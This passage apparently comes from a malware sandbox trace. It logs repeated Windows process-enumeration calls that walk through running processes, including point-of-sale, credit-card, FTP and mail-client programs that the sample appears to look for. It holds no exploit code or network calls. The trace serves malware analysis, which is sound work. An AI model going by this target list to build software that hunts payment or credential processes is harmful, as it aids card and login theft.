th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0261.850] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0261.851] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0261.853] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0261.855] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0261.860] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0261.862] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0261.864] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0261.866] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0261.868] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0261.869] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0261.874] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0261.875] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0261.877] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0261.879] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0261.881] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0261.883] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0261.946] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0261.948] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0261.950] CloseHandle (hObject=0x1d14) returned 1 [0261.950] Sleep (dwMilliseconds=0x64) [0262.090] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0262.110] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.112] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0262.114] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0262.116] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.118] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0262.199] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.201] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0262.203] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0262.205] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0262.207] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.209] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.211] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0262.265] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.267] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.269] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.354] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.357] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.359] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.361] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.363] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0262.365] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0262.368] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0262.371] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.373] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0262.375] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0262.377] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0262.380] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0262.383] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0262.385] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.450] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0262.452] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0262.453] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0262.455] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0262.457] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0262.459] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0262.460] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0262.462] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0262.463] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0262.465] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0262.467] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0262.469] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0262.471] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0262.472] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0262.474] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0262.476] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0262.477] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0262.479] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0262.530] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0262.532] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0262.533] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0262.535] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0262.537] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0262.539] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0262.541] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0262.545] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0262.546] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0262.548] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0262.550] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0262.552] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0262.554] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0262.556] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0262.559] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0262.562] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0262.564] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0262.566] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, 